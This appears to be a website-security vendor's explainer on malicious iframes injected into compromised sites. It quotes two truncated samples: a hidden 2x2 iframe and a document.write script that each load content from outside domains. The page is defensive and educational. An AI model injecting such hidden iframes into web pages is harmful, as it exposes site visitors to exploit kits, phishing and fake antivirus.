PRICING SUPPORT LOGIN

An inline frame (iframe) is used to embed another document within the current HTML document.

Why is it used by the "bad guys"?

Because as the definition implies, it allows you to insert another document inside the current HTML page. And the attackers use that feature to insert malicious content into the compromised sites (to redirect to spam, exploit kits, Fake AV, phishing, etc).

Example of malframes (malware iframes):

Iframes can be injected and hidden in different ways inside web sites, but this is how it looks to the web browser (if you use view-source):

<iframe src="http://rec-creations.com/adv.php" height="2" width="2"...

This code loads whatever content is inside rec-creations.com/adv.php and executes by the browser of the victim.

Encoded iframe

Iframes can also be encoded inside a javascript call, like this one:

<script type="text/javascript">document.write("<iframe src="http://objectcash.in/in.cgi?19" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2...